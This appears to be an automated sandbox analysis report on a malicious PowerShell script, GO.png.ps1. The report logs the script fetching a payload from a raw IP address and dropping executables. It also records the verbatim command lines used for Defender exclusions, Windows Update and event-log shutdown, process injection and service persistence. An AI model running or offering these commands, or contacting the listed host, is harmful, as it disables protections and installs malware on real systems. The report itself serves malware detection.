00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.178
        Source: global trafficHTTP traffic detected: GET /M.png HTTP/1.1Host: 176.113.115.178Connection: Keep-Alive
        Source: powershell.exe, 00000000.00000002.1821213500.0000023D1E88C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E7D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178
        Source: powershell.exe, 00000000.00000002.1821213500.0000023D1D0B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.178/M.png
        Source: powershell.exe, 00000003.00000002.1606518311.0000021C213A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
        Source: powershell.exe, 00000000.00000002.1889544505.0000023D2D035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1889544505.0000023D2CEF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000000.00000002.1821213500.0000023D1CE81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1579286681.0000021C08DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000000.00000002.1821213500.0000023D1CE81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1579286681.0000021C08DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000003.00000002.1579286681.0000021C08FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000000.00000002.1821213500.0000023D1DAB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000000.00000002.1889544505.0000023D2D035000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1889544505.0000023D2CEF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1821213500.0000023D1E894000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1600788987.0000021C18E13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        System Summary

        barindex
        PE file contains section with special chars
        Source: LB311.exe.0.drStatic PE information: section name:
        Source: LB311.exe.0.drStatic PE information: section name: .idata
        Source: LB311.exe.0.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: .idata
        Source: Mig.exe.6.drStatic PE information: section name:
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB311.exeJump to dropped file
        Uses powercfg.exe to modify the power settings
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,28_2_00000001400010C0
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917528C8 NtEnumerateValueKey,NtEnumerateValueKey,35_2_000002E9917528C8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCE202C NtQuerySystemInformation,StrCmpNIW,41_2_00000213BDCE202C
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16E28C8 NtEnumerateValueKey,NtEnumerateValueKey,45_2_0000026DB16E28C8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4AE630E93_2_00007FFB4AE630E9
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_000000014000226C28_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_00000001400014D828_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_000000014000256028_2_0000000140002560
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991721F2C35_2_000002E991721F2C
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99172D0E035_2_000002E99172D0E0
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917338A835_2_000002E9917338A8
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E991752B2C35_2_000002E991752B2C
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E99175DCE035_2_000002E99175DCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000002E9917644A835_2_000002E9917644A8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCBD0E041_2_00000213BDCBD0E0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCC38A841_2_00000213BDCC38A8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCB1F2C41_2_00000213BDCB1F2C
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCEDCE041_2_00000213BDCEDCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCF44A841_2_00000213BDCF44A8
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000213BDCE2B2C41_2_00000213BDCE2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709A1F2C44_2_00000158709A1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709AD0E044_2_00000158709AD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709B38A844_2_00000158709B38A8
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709D2B2C44_2_00000158709D2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709DDCE044_2_00000158709DDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000158709E44A844_2_00000158709E44A8
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16BD0E045_2_0000026DB16BD0E0
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16C38A845_2_0000026DB16C38A8
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16B1F2C45_2_0000026DB16B1F2C
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16EDCE045_2_0000026DB16EDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16F44A845_2_0000026DB16F44A8
        Source: C:\Windows\System32\dwm.exeCode function: 45_2_0000026DB16E2B2C45_2_0000026DB16E2B2C
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3EFFCD0E046_2_000002A3EFFCD0E0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3EFFD38A846_2_000002A3EFFD38A8
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3EFFC1F2C46_2_000002A3EFFC1F2C
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F0662B2C46_2_000002A3F0662B2C
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F06744A846_2_000002A3F06744A8
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002A3F066DCE046_2_000002A3F066DCE0
        Source: Joe Sandbox ViewDropped File: C:\ProgramData\Mig\Mig.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\LB311.exe A1A8CFCC74F8F96FD09115189DEFE07AC6FC2E85A9FF3B3EC9C6F454AEDE1C1D
        Source: classification engineClassification label: mal100.spyw.evad.winPS1@58/76@0/1
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,28_2_000000014000226C
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,28_2_00000001400019C4
        Source: C:\Windows\System32\dialer.exeCode function: 28_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,28_2_000000014000226C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB311.exeJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6784:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2156:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3676:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_appywb3p.auw.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: GO.png.ps1ReversingLabs: Detection: 18%
        Source: LB311.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: Mig.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB311.exe "C:\Users\user\AppData\Roaming\LB311.exe"
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\ProgramData\Mig\Mig.exe C:\ProgramData\Mig\Mig.exe
        Source: C:\Windows\System32\lsass.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\LB311.exe "C:\Users\user\AppData\Roaming\LB311.exe" Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LIB"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
        Source: C:\Users\user\AppData\Roaming\LB311.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LIB"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
